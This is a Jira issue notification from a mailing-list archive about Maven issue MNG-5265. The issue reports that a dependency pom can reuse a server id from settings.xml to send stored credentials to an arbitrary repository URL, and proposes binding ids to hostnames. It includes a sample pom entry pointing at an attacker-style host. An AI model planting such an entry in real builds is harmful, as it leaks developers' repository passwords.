[jira] (MNG-5265) enforce repository url verification for passing authz

Olivier Lamy (JIRA) Mon, 27 Jan 2014 04:28:09 -0800

    [ 
https://jira.codehaus.org/browse/MNG-5265?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=340234#comment-340234
 ]


Olivier Lamy commented on MNG-5265:
-----------------------------------

As said on a thread in mailing list, I still consider it as a possible security 
problem. But ATM no time to work on that

> enforce repository url verification for passing authz
> -----------------------------------------------------
>
>                 Key: MNG-5265
>                 URL: https://jira.codehaus.org/browse/MNG-5265
>             Project: Maven 2 & 3
>          Issue Type: Improvement
>          Components: Settings
>    Affects Versions: 2.0.10, 2.2.1, 3.0.2, 3.0.3, 3.0.4
>            Reporter: Olivier Lamy
>             Fix For: 3.2
>
>
> Related discussion: http://markmail.org/message/7pswshucxc7qwtef
> in your settings you have:
> {code}
>     <server>
>       <username>olamy</username>
>       <password>reallycomplicatedpassword</password>
>       <id>foo.org</id>
>     </server>
> {code}
> During dependencies resolution, you get a pom with a repository.
> {code}
>     <repository>
>       <id>foo.org</id>
>       <url>http://yourpasswordwillbehacked.org/</url>
>     </repository>
> {code}
> Idea id in settings must contains the target hostname.



--
This message was sent by Atlassian JIRA
(v6.1.6#6162)

[jira] (MNG-5265) enforce repository url verification for passing authz

Reply via email to